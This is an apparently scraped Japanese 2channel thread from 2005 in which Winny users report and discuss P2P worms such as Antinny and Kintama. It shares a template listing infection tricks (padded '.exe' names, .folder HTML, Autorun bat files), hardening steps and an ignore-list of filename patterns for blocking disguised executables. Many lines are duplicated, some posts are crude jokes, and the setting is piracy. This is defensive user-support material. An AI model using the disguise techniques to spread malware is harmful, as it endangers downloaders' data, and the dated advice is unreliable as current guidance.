実は僕ウイルスなんて良く分からないから不安なんだ〜
とりあえず、msconfigもスタートアップもチェキして、ファイル検索で、システムと隠しファイルもオンして、昨日作成されたファイルや、最近更新されたファイルもチェキして、
見つけたファイル名でレジストリも検索したし・・・
でも不安なんだ・・・
だから僕今からサイインスコって裏技を使おうと思うんだけど・・
てゆうか実は、さっきまでゲームしててウイルスの事なんて気にしてなかったんだけど・・
ああ、恐ろしい。
この感情は僕のおてぃんてぃんが初めて大きくなって・・・
とりあえず、ムキムキしてたら透明な汁が気持いいみたいな・・
そう、気持いい。
もちろんサイインスコなんてしないよ、でも最近作ったレポートをDVDに焼いといた・・
いや、ウイルスとかマジびびったって・・ 自称趣味はPC 特技はクラックの俺でもびびったって・・
あー気持いい。
とりあえず、msconfigもスタートアップもチェキして、ファイル検索で、システムと隠しファイルもオンして、昨日作成されたファイルや、最近更新されたファイルもチェキして、
見つけたファイル名でレジストリも検索したし・・・
でも不安なんだ・・・
だから僕今からサイインスコって裏技を使おうと思うんだけど・・
てゆうか実は、さっきまでゲームしててウイルスの事なんて気にしてなかったんだけど・・
ああ、恐ろしい。
この感情は僕のおてぃんてぃんが初めて大きくなって・・・
とりあえず、ムキムキしてたら透明な汁が気持いいみたいな・・
そう、気持いい。
もちろんサイインスコなんてしないよ、でも最近作ったレポートをDVDに焼いといた・・
いや、ウイルスとかマジびびったって・・ 自称趣味はPC 特技はクラックの俺でもびびったって・・
あー気持いい。
(つづき)
・
・
そう、便秘が解消した気持ちよさと一緒よ うぇ
・
・
そう、便秘が解消した気持ちよさと一緒よ うぇ
833 :[名無し]さん(bin+cue).rar:05/01/26 05:50:15 ID:lXhfvzIv0
キンタマかかったとしても後でアンチウイルスでスキャンすりゃあ大丈夫なんだよな?
834 :[名無し]さん(bin+cue).rar:05/01/26 06:27:13 ID:5ZaZSJsH0
このスレ推奨のキンタマ対応策
1、PCを窓から投げ捨てる
2、クリーンインスコ
3、放置
1、PCを窓から投げ捨てる
2、クリーンインスコ
3、放置
835 :[名無し]さん(bin+cue).rar:05/01/26 06:49:04 ID:Fa+I/V3G0
放置は勧めてないだろ
836 :[名無し]さん(bin+cue).rar:05/01/26 07:16:00 ID:nKGpiPof0
放置すんのは今更キンタマ踏んだ上にテンプレも埋められないヴォケの方じゃね?
837 :[名無し]さん(bin+cue).rar:05/01/26 08:09:53 ID:pzQbrOcY0
そういうのがいまだにACCS攻撃してるわけだな。
838 :[名無し]さん(bin+cue).rar:05/01/26 08:53:01 ID:+4f6Kn7x0
面白いから放置・・・といってもACCSは迷惑してるみたいだしなあ
839 :[名無し]さん(bin+cue).rar:05/01/26 09:26:04 ID:DmPBY1CV0
【使用OS】 XP ホーム FMV DESKPOWER H70K9V(FMVH70K9V)
【WindowsUpdateしてるか】 時々来るから必ずしてる
【AntiVirusは】 トレンドマイクロ
【ちゃんとUpdateしてるか】 時々来るから必ずしてる
【スキャンした結果】 なし
【オンラインスキャンしたならその結果は】 なし
【Winnyのバージョン】 2.0 b7.1
【Winny歴、総DL量は】 半年30G
【テンプレを読んだか】 読んだ。
【テンプレにある対策を実行したか】 該当にない。
【症状か具体的に、分かる限りすべて書く】 タスクバーが上にいってしまった。
【何をしたらそんなことになったのか】デスクトップ整理してた時か、 よくわからない急になった。
【これまでにとった措置】 怖くなった。
【WindowsUpdateしてるか】 時々来るから必ずしてる
【AntiVirusは】 トレンドマイクロ
【ちゃんとUpdateしてるか】 時々来るから必ずしてる
【スキャンした結果】 なし
【オンラインスキャンしたならその結果は】 なし
【Winnyのバージョン】 2.0 b7.1
【Winny歴、総DL量は】 半年30G
【テンプレを読んだか】 読んだ。
【テンプレにある対策を実行したか】 該当にない。
【症状か具体的に、分かる限りすべて書く】 タスクバーが上にいってしまった。
【何をしたらそんなことになったのか】デスクトップ整理してた時か、 よくわからない急になった。
【これまでにとった措置】 怖くなった。
840 :[名無し]さん(bin+cue).rar:05/01/26 09:29:58 ID:+S5LmOzj0
841 :[名無し]さん(bin+cue).rar:05/01/26 09:50:22 ID:HOo5N+uA0
【使用OS】 Win2000 sp4
【WindowsUpdateしてるか】 最新
【AntiVirusは】 ノートン
【ちゃんとUpdateしてるか】 最新
【スキャンした結果】 ウイルスは見つかりません
【オンラインスキャンしたならその結果は】 ウイルスは見つかりません
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 はい
【症状か具体的に、分かる限りすべて書く】 一見、問題なし
【何をしたらそんなことになったのか】
ファイルに入ってたbug.exeといういかにも怪しいのと、ゲームイメージを
デーモンに入れて、その中のsetup.exeを実行すると「ハードディスクを初期化しますか?」と
聞いてくるのを発見。どちらもノートンでスキャンしても問題はなし。(ゲームはCD全体スキャン)
今まで、ノートンに反応しないウイルスには出会ったことがないので、サブPCにファイルを移して
実行してみると、bug.exeの方は画面が上のほうから徐々に茶色くなってきて、やがて画面全体が
茶色くなって操作を受け付けなくなり、しかたなく強制終了で再起動。
もう一つの方は、おそらくゲーム内のsetup.exeをフォーマットソフトにすりかえただけかと思ってたけど
「ハードディスクを初期化しますか?」というのに「いいえ」を押すと、IDを入れてくださいとかでて、
それもキャンセルするとハードディスク初期化ウイルスとか物騒なウインドウが出る。
その後、強制終了でもウインドウが消えないのでしかたなく再起動。
【これまでにとった措置】
ノートンの完全ウイルススキャン。ウイルスバスターのオンラインスキャン。
テンプレの★流行種その3 【Autorun+bat】 に書いてある活動内容が行われていないかチェック
再起動後は特に問題がないようにも見えるんですが、
何か知らないところで、活動とかしていないか気になるんですが、これらのは既知のものでしょうか?
bug.exeはテンプレに・bug.exeで気をそらす。 とあったので、操作不能になる以外実害はないのかも。
実害がないようならノートンには提出しない方がいいのか、一応やっておいた方がいいのかどうでしょう?
【WindowsUpdateしてるか】 最新
【AntiVirusは】 ノートン
【ちゃんとUpdateしてるか】 最新
【スキャンした結果】 ウイルスは見つかりません
【オンラインスキャンしたならその結果は】 ウイルスは見つかりません
【テンプレを読んだか】 はい
【テンプレにある対策を実行したか】 はい
【症状か具体的に、分かる限りすべて書く】 一見、問題なし
【何をしたらそんなことになったのか】
ファイルに入ってたbug.exeといういかにも怪しいのと、ゲームイメージを
デーモンに入れて、その中のsetup.exeを実行すると「ハードディスクを初期化しますか?」と
聞いてくるのを発見。どちらもノートンでスキャンしても問題はなし。(ゲームはCD全体スキャン)
今まで、ノートンに反応しないウイルスには出会ったことがないので、サブPCにファイルを移して
実行してみると、bug.exeの方は画面が上のほうから徐々に茶色くなってきて、やがて画面全体が
茶色くなって操作を受け付けなくなり、しかたなく強制終了で再起動。
もう一つの方は、おそらくゲーム内のsetup.exeをフォーマットソフトにすりかえただけかと思ってたけど
「ハードディスクを初期化しますか?」というのに「いいえ」を押すと、IDを入れてくださいとかでて、
それもキャンセルするとハードディスク初期化ウイルスとか物騒なウインドウが出る。
その後、強制終了でもウインドウが消えないのでしかたなく再起動。
【これまでにとった措置】
ノートンの完全ウイルススキャン。ウイルスバスターのオンラインスキャン。
テンプレの★流行種その3 【Autorun+bat】 に書いてある活動内容が行われていないかチェック
再起動後は特に問題がないようにも見えるんですが、
何か知らないところで、活動とかしていないか気になるんですが、これらのは既知のものでしょうか?
bug.exeはテンプレに・bug.exeで気をそらす。 とあったので、操作不能になる以外実害はないのかも。
実害がないようならノートンには提出しない方がいいのか、一応やっておいた方がいいのかどうでしょう?
842 :[名無し]さん(bin+cue).rar:05/01/26 12:12:50 ID:fu7ddoSm0
>834を修正
このスレ推奨のキンタマ対応策
1、PCを窓から投げ捨てる
2、クリーンインスコ
3、気づかない
このスレ推奨のキンタマ対応策
1、PCを窓から投げ捨てる
2、クリーンインスコ
3、気づかない
843 :[名無し]さん(bin+cue).rar:05/01/26 12:59:26 ID:iLZXqWSr0
>>841
ノートンに提出しといて下さい
ノートンに提出しといて下さい
844 :[名無し]さん(bin+cue).rar:05/01/26 13:13:57 ID:XU7SkAhg0
このスレ推奨のキンタマ対応策
1、PCを窓から投げ捨てる
2、クリーンインスコ
3、いしのなかにいる
1、PCを窓から投げ捨てる
2、クリーンインスコ
3、いしのなかにいる
845 :[名無し]さん(bin+cue).rar:05/01/26 13:37:44 ID:Z3hAwuM20
趣味は週に1度のクリインス子ですが、なにか?
846 :[名無し]さん(bin+cue).rar:05/01/26 13:39:21 ID:R7uen4bh0
注意ウイルス入り
ソースネクストウイルスセキュリティ反応なし
(一般ゲーム)Postal2 Power up kit ポスタル2 パワーアップキット 日本語化(ccd).rar
ハッシュは不明です。
ソースネクストウイルスセキュリティ反応なし
(一般ゲーム)Postal2 Power up kit ポスタル2 パワーアップキット 日本語化(ccd).rar
ハッシュは不明です。
847 :[名無し]さん(bin+cue).rar:05/01/26 14:01:58 ID:uEjGzQHM0
じゃあ、PCにフロントチョークを決めてみました
848 :[名無し]さん(bin+cue).rar:05/01/26 21:03:52 ID:y3qEZjFh0
みんなウィルスチェックに何使ってる?
俺はMcAfeeだけど
無料でいいのってないね
俺はMcAfeeだけど
無料でいいのってないね
849 :[名無し]さん(bin+cue).rar:05/01/26 21:04:53 ID:/YWgx1NV0
AVGとノートン
850 :[名無し]さん(bin+cue).rar:05/01/26 21:08:00 ID:F5rcpMRs0
自分の勘
851 :[名無し]さん(bin+cue).rar:05/01/26 21:20:39 ID:y3qEZjFh0
852 :[名無し]さん(bin+cue).rar:05/01/26 21:30:02 ID:ORUwv2xd0
McAfeeで良いと思うが
853 :[名無し]さん(bin+cue).rar:05/01/26 23:02:34 ID:67sPbw5S0
スコット=ノートン大先生
854 :[名無し]さん(bin+cue).rar:05/01/26 23:03:29 ID:iLZXqWSr0
マカフィーじゃキンタマに刺される
855 :[名無し]さん(bin+cue).rar:05/01/26 23:07:18 ID:aJqW6Ko70
McAfeeでキンタマくらったやつがたくさんいる、ノートン先生にしとけ。
856 :[名無し]さん(bin+cue).rar:05/01/26 23:12:01 ID:y3qEZjFh0
無料で使えるソフトで、いいのは無いんですかね
857 :[名無し]さん(bin+cue).rar:05/01/26 23:18:23 ID:iLZXqWSr0
P2Pやる上で聞いてんのか?
858 :[名無し]さん(bin+cue).rar:05/01/27 02:29:59 ID:iMjUeZ1Q0
ノートン&バスターでオンラインスキャン、
マカフィー常駐なオレ
マカフィー常駐なオレ
859 :[名無し]さん(bin+cue).rar:05/01/27 02:32:59 ID:f5+QbGbp0
ノートン先生にキンタマ付けて流せば良いのか。
なるほどなるほど。
なるほどなるほど。
860 :[名無し]さん(bin+cue).rar:05/01/27 10:41:38 ID:ha6CoLK00
SSM+フリーのアンチウィルスでいいだろ
861 :[名無し]さん(bin+cue).rar:05/01/27 11:40:29 ID:DE0fwbsS0
862 :[名無し]さん(bin+cue).rar:05/01/27 11:46:49 ID:FF0pk0fC0
アンチウイルスの話はセキュ板でやってくれ
ここはウイルスの情報交換のスレだろ
またどっかの社員が嘘の優劣話を吹きに来るからウザイ
ここはウイルスの情報交換のスレだろ
またどっかの社員が嘘の優劣話を吹きに来るからウザイ
863 :[名無し]さん(bin+cue).rar:05/01/27 12:31:10 ID:FWXNRZR90
ぜひわが社の割れを使ってくださいってか?
社員がこんなところで宣伝するわけないでしょ
社員がこんなところで宣伝するわけないでしょ
864 :[名無し]さん(bin+cue).rar:05/01/27 12:42:22 ID:p9OjniaH0
「おまえはバカだ」と感染者をあざ笑う新種ワーム
ttp://www.itmedia.co.jp/enterprise/articles/0501/27/news022.html
ttp://www.itmedia.co.jp/enterprise/articles/0501/27/news022.html
865 :[名無し]さん(bin+cue).rar:05/01/27 12:44:52 ID:p9OjniaH0
こっちだ。スペース入いちゃったorz
ttp://www.itmedia.co.jp/enterprise/articles/0501/27/news022.html
ttp://www.itmedia.co.jp/enterprise/articles/0501/27/news022.html
866 :[名無し]さん(bin+cue).rar:05/01/27 12:57:49 ID:FF0pk0fC0
>>863
過去ログ読んで気づかないとは、鈍い君は幸せものだねw
過去ログ読んで気づかないとは、鈍い君は幸せものだねw
867 :[名無し]さん(bin+cue).rar:05/01/27 13:08:18 ID:CG7NHb950
ほらねw
868 :[名無し]さん(bin+cue).rar:05/01/27 14:16:54 ID:zyC972920
869 :[名無し]さん(bin+cue).rar:05/01/27 18:29:59 ID:9cj103He0
WinnyおよびPCレベル判定診断
どちらかをよく考ええらんでください。
あなたのパソコンに大切なデータが入ってました、それも大量にいままで
ためこんだものです。
ウイルスを踏んでしまいました。もしそうなったらどちらの症状か
選んでください。
A:大事なデータ丸ごと消去される
B:データは無事だったが、しかしWinnyなどに流れてしまった。
診断結果は
900レス目にお答えします。
どちらかをよく考ええらんでください。
あなたのパソコンに大切なデータが入ってました、それも大量にいままで
ためこんだものです。
ウイルスを踏んでしまいました。もしそうなったらどちらの症状か
選んでください。
A:大事なデータ丸ごと消去される
B:データは無事だったが、しかしWinnyなどに流れてしまった。
診断結果は
900レス目にお答えします。
870 :[名無し]さん(bin+cue).rar:05/01/27 18:51:08 ID:5c8hgKzK0
>>869
B
B
871 :[名無し]さん(bin+cue).rar:05/01/27 19:09:27 ID:CARKCvEx0
b
872 :[名無し]さん(bin+cue).rar:05/01/27 19:29:13 ID:qeira93C0
b
個人情報が分かるファイルなんてないしな
個人情報が分かるファイルなんてないしな
873 :[名無し]さん(bin+cue).rar:05/01/27 19:32:44 ID:c1jSZTeH0
C:流出のために圧縮が始まったが、空きスペースが無くて未遂
874 :[名無し]さん(bin+cue).rar:05/01/27 20:56:40 ID:UDxKxk1U0
a
こないだ久しぶりに見た夢が、Whiterでデータ全消去される夢で鬱
いやぁ本当に恐かった・・・ちびると思った
こないだ久しぶりに見た夢が、Whiterでデータ全消去される夢で鬱
いやぁ本当に恐かった・・・ちびると思った
875 :[名無し]さん(bin+cue).rar:05/01/27 21:20:58 ID:N32NUiO50
B
876 :[名無し]さん(bin+cue).rar:05/01/27 21:21:04 ID:IkQM3lMQ0
>>874
おねしょ乙
おねしょ乙
追記
>>もしそうなったらどちらの症状か
選んでください。
もしそうなったらせめてどちらかを選べって事です。
>>もしそうなったらどちらの症状か
選んでください。
もしそうなったらせめてどちらかを選べって事です。
878 :[名無し]さん(bin+cue).rar:05/01/27 21:31:11 ID:AxjcAI+j0
よくわかんね
〜だと嫌だ困るって方を選ばそうとしてるのか、
〜になりそうな悪寒って方を選ばそうとしてるのか、
あるいは実際に〜だったってのを選ばそうとしてるのか
>もしそうなったらせめてどちらかを選べ
もしそうなったら選んでる余地は無いわけだしな
〜だと嫌だ困るって方を選ばそうとしてるのか、
〜になりそうな悪寒って方を選ばそうとしてるのか、
あるいは実際に〜だったってのを選ばそうとしてるのか
>もしそうなったらせめてどちらかを選べ
もしそうなったら選んでる余地は無いわけだしな
879 :[名無し]さん(bin+cue).rar:05/01/27 22:41:47 ID:KsCzGpcr0
A
だって重要なデータは復帰できるようにしてあるし
でも戸棚のDVDやスタンドアローンPC上に避難したデータも消しちゃうような画期的ウイルスだったらB
だって重要なデータは復帰できるようにしてあるし
でも戸棚のDVDやスタンドアローンPC上に避難したデータも消しちゃうような画期的ウイルスだったらB
880 :[名無し]さん(bin+cue).rar:05/01/27 23:08:52 ID:X5JA1vvS0
急にHDがガリガリいいだして
ネットにもアクセスするから(((( ;゚Д゚)))ガクガクブルブルしていたが
自動liveupdateだった(・∀・)
普段は自動更新前に取りに行くこと多いからなぁ・・・
ネットにもアクセスするから(((( ;゚Д゚)))ガクガクブルブルしていたが
自動liveupdateだった(・∀・)
普段は自動更新前に取りに行くこと多いからなぁ・・・
881 :[名無し]さん(bin+cue).rar:05/01/27 23:10:19 ID:UQTejFBo0
ヽ(・ω・)/ ズコー
\(.\ ノ
\(.\ ノ
882 :[名無し]さん(bin+cue).rar:05/01/27 23:48:05 ID:4L/H9Wsq0
A
バックアップとってないデータは重要なデータではない。
バックアップとってないデータは重要なデータではない。
883 :[名無し]さん(bin+cue).rar:05/01/27 23:51:52 ID:D5IStntT0
とりあえずA
俺にとってはどっちも同じ、再インスコめんどくせ。
俺にとってはどっちも同じ、再インスコめんどくせ。
884 :[名無し]さん(bin+cue).rar:05/01/28 01:54:33 ID:BG2SdkBj0
mellpo.exe
885 :[名無し]さん(bin+cue).rar:05/01/28 12:55:48 ID:5EsO7jTU0
日本語の不自由な人が心理テストするなよ
886 :[名無し]さん(bin+cue).rar:05/01/28 13:27:36 ID:pazLCnc30
ぶっちゃけ教えてクンよりウザイ>意味不明心理テストとそれに答えてる奴ら
887 :[名無し]さん(bin+cue).rar:05/01/28 14:59:46 ID:ZmQMqqw00
1を熟読したんですが良く分からないことが。
久しぶりにny始めたら.mpg.lzh みたいなのが多いこと多いこと もちろんキンタマビンゴー
XP HOME SP2、ノーd自動うp常駐、拡張子隠しファイル表示設定です
ところで恐る恐る解凍してみたら、一度は検疫失敗・WinRARのログみたいなとこ汚されて
プログラムファイルアクセスするたんびに先生がうざいからRARを再インスコ。感染はしなかった。
2度目に解凍したら検疫成功、RARも汚されなかったけど、出来たフォルダはフォルダアイコンでxxx.aviという良く分からないもの。
これも恐る恐る開いたら、単なるちゃんとした動画みたいで。縮小版表示で先頭動画画像が見えてた。
これって、検疫されたよってことなんでしょうか?中の人はもう単なる動画として実行しちゃってもよかですか?
動画再生までは勇気が出なかった・・
たぶん検疫しなかったらそのフォルダの中にきっとキンタマ.exeが入ってたのでしょうけど。どうなんでしょ?
久しぶりにny始めたら.mpg.lzh みたいなのが多いこと多いこと もちろんキンタマビンゴー
XP HOME SP2、ノーd自動うp常駐、拡張子隠しファイル表示設定です
ところで恐る恐る解凍してみたら、一度は検疫失敗・WinRARのログみたいなとこ汚されて
プログラムファイルアクセスするたんびに先生がうざいからRARを再インスコ。感染はしなかった。
2度目に解凍したら検疫成功、RARも汚されなかったけど、出来たフォルダはフォルダアイコンでxxx.aviという良く分からないもの。
これも恐る恐る開いたら、単なるちゃんとした動画みたいで。縮小版表示で先頭動画画像が見えてた。
これって、検疫されたよってことなんでしょうか?中の人はもう単なる動画として実行しちゃってもよかですか?
動画再生までは勇気が出なかった・・
たぶん検疫しなかったらそのフォルダの中にきっとキンタマ.exeが入ってたのでしょうけど。どうなんでしょ?
888 :[名無し]さん(bin+cue).rar:05/01/28 15:27:00 ID:uGXZEcdk0
>>887
>出来たフォルダはフォルダアイコンでxxx.aviという良く分からないもの。
これ読む限り拡張子偽装にしか思えないけど、実際どうなの?正確に文章書けてるの?
それにノートンがどう処理したか知りたいならログ確認すれば?
>出来たフォルダはフォルダアイコンでxxx.aviという良く分からないもの。
これ読む限り拡張子偽装にしか思えないけど、実際どうなの?正確に文章書けてるの?
それにノートンがどう処理したか知りたいならログ確認すれば?
889 :[名無し]さん(bin+cue).rar:05/01/28 15:30:04 ID:X04enosu0
>>887
(・∀・)コンニチハ! & (=人=)ナムナム
(・∀・)コンニチハ! & (=人=)ナムナム
890 :[名無し]さん(bin+cue).rar:05/01/28 16:52:04 ID:ZmQMqqw00
(TV) ウゴウゴルーガ 19921224木199302##*夕再 (28m02s QVGA 136015498byte).avi.exe
(TV) ウゴウゴルーガ 19930120水 (29m04s QVGA 141937184byte).avi.exe
検疫ログにはこうある。拡張子表示してても.exeはエクスプローラ上では見えなかった。
開いてみたのはフォルダのみ。
もう元ファイルは消したけど今これを消してみた。じゃあ一応スキャンもしてくる。
(TV) ウゴウゴルーガ 19930120水 (29m04s QVGA 141937184byte).avi.exe
検疫ログにはこうある。拡張子表示してても.exeはエクスプローラ上では見えなかった。
開いてみたのはフォルダのみ。
もう元ファイルは消したけど今これを消してみた。じゃあ一応スキャンもしてくる。
891 :[名無し]さん(bin+cue).rar:05/01/28 17:20:48 ID:ZmQMqqw00
やっぱり感染はなしだ。xxx.avi 〜なが〜いスペース〜 .exe
ですらなかったし
感染ログはW32.antinny.B
ですらなかったし
感染ログはW32.antinny.B
892 :[名無し]さん(bin+cue).rar:05/01/28 18:08:38 ID:72VsiFKU0
偽フォルダを開いたんじゃねぇの
893 :[名無し]さん(bin+cue).rar:05/01/28 19:26:22 ID:I/7kW9+0O
mellpo調べてみたけど情報なさすぎ。
CのPROGRAM FILESの下にMELLPOが作られてワードやらエク(ry
と、他のヤシと同じなんだがこれって外部に送信してんの?
だとしたらnyの使用関係なし?
CのPROGRAM FILESの下にMELLPOが作られてワードやらエク(ry
と、他のヤシと同じなんだがこれって外部に送信してんの?
だとしたらnyの使用関係なし?
894 :[名無し]さん(bin+cue).rar:05/01/28 19:42:49 ID:MqcQm7lR0
無関係。
895 :[名無し]さん(bin+cue).rar:05/01/28 21:11:51 ID:Hwaekdu00
久しぶりにny始めて大騒ぎ
896 :[名無し]さん(bin+cue).rar:05/01/28 21:51:53 ID:Qqn05HYW0
怪しいレジストリも削除したし、キンタマだっていないのに、
未だにwinnyを起動するたびにキャッシュが消されるというのは・・・・orz
再インスコしろって事?
未だにwinnyを起動するたびにキャッシュが消されるというのは・・・・orz
再インスコしろって事?
897 :[名無し]さん(bin+cue).rar:05/01/28 23:24:16 ID:X04enosu0
>>896
(・∀・)コンニチハ!亜種 & (=人=)ナムナム
(・∀・)コンニチハ!亜種 & (=人=)ナムナム
898 :[名無し]さん(bin+cue).rar:05/01/28 23:26:21 ID:j3aRe+RZ0
手っ取り早いわな。
896> ファイル名を指定して実行でmsconfigでとりあえずサービスとかも全部切れば?
あと、XPだとファイルの検索でシステムフォルダのファイルが見えないので、詳細設定にチェックいれて、
感染した日にできたファイル等を見つけて削除しれ・・
あと、XPだとファイルの検索でシステムフォルダのファイルが見えないので、詳細設定にチェックいれて、
感染した日にできたファイル等を見つけて削除しれ・・
900 :[名無し]さん(bin+cue).rar:05/01/29 01:07:24 ID:syGNId5G0
mellpoって具体的に何やってるんだ?
901 :[名無し]さん(bin+cue).rar:05/01/29 01:10:05 ID:Gd/JMsQI0
さて、そろそろ次スレについて語ろうか
902 :[名無し]さん(bin+cue).rar:05/01/29 03:09:11 ID:VwnRpIvu0
ニュイルス、ニャーム解析者の集うスレPart33
903 :[名無し]さん(bin+cue).rar:05/01/29 10:35:37 ID:IzSYBCaz0
904 :[名無し]さん(bin+cue).rar:05/01/29 12:15:59 ID:LFshKLtC0
( ´д)ヒソ(´д`)ヒソ(д` )ヒソ
905 :[名無し]さん(bin+cue).rar:05/01/29 12:49:31 ID:w1pS4DkB0
>>903
頭に蛆がワイテル
頭に蛆がワイテル
906 :[名無し]さん(bin+cue).rar:05/01/29 13:14:28 ID:1WKWYDFD0
Y太のことかー!!w
●ここは初心者の質問・救済スレではありません(これ大事)●
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc
■主な流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg .exe」)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・CD・DVDでAutorunを利用してbatファイルを実行
・解凍ソフトの脆弱性を利用し、スタートアップに解凍させて再起動後exeを実行
■ダウンロード後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルは安易に実行しない
・ファイルのアイコンが偽装されてないか確認する
■全ての感染者に共通の、確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、退避するなり諦めるなりしてください。
【前スレ】
Winnyを狙ったワーム・ウイルス情報 Part32
http://tmp4.2ch.net/test/read.cgi/download/1102892779/
テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc
■主な流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg .exe」)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・CD・DVDでAutorunを利用してbatファイルを実行
・解凍ソフトの脆弱性を利用し、スタートアップに解凍させて再起動後exeを実行
■ダウンロード後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルは安易に実行しない
・ファイルのアイコンが偽装されてないか確認する
■全ての感染者に共通の、確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、退避するなり諦めるなりしてください。
【前スレ】
Winnyを狙ったワーム・ウイルス情報 Part32
http://tmp4.2ch.net/test/read.cgi/download/1102892779/
テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
908 :[名無し]さん(bin+cue).rar:05/01/29 15:27:23 ID:DYLrTfHq0
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。
【OS】
【WindowsUpdateしてるか】
【使用AntiVirusソフト】
【AntiVirusをUpdateしてるか】
【ウイルススキャンの結果】
【オンラインスキャンの結果】
【Winnyのバージョン】
【Winny歴、総DL量】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状(具体的に、分かる限りすべて書く)】
【何をしたらそんなことになったのか】
【これまでにとった措置】
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。
【OS】
【WindowsUpdateしてるか】
【使用AntiVirusソフト】
【AntiVirusをUpdateしてるか】
【ウイルススキャンの結果】
【オンラインスキャンの結果】
【Winnyのバージョン】
【Winny歴、総DL量】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状(具体的に、分かる限りすべて書く)】
【何をしたらそんなことになったのか】
【これまでにとった措置】
909 :[名無し]さん(bin+cue).rar:05/01/29 15:27:55 ID:DYLrTfHq0
■推奨無視リスト
このままIgnore.txtにコピペしてください。
.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。
このままIgnore.txtにコピペしてください。
.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。
910 :[名無し]さん(bin+cue).rar:05/01/29 15:28:26 ID:DYLrTfHq0
■感染しないための注意1 〜あらかじめやっておくと良いこと〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・うっかり操作防止のため、エクスプローラの操作はダブルクリックで。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorunは切っておく(方法は下記参照)。
・適切な無視リストの設定などで、ウイルスを呼び込まない。
・Whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
詳しくは下記サイト参照。
ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
(拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・アイコンを偽装したexeを見分けるため、フォルダアイコン、テキストファイルなど偽装されやすいアイコンは標準のものから変更しておく。
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
※レジストリの改変は致命的なエラーを引き起こす可能性があるので、自信がなければ触らないこと
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
※アプリケーションのインストール時に弊害が起こることもあるので注意。
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・うっかり操作防止のため、エクスプローラの操作はダブルクリックで。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorunは切っておく(方法は下記参照)。
・適切な無視リストの設定などで、ウイルスを呼び込まない。
・Whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
詳しくは下記サイト参照。
ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
(拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・アイコンを偽装したexeを見分けるため、フォルダアイコン、テキストファイルなど偽装されやすいアイコンは標準のものから変更しておく。
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
※レジストリの改変は致命的なエラーを引き起こす可能性があるので、自信がなければ触らないこと
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
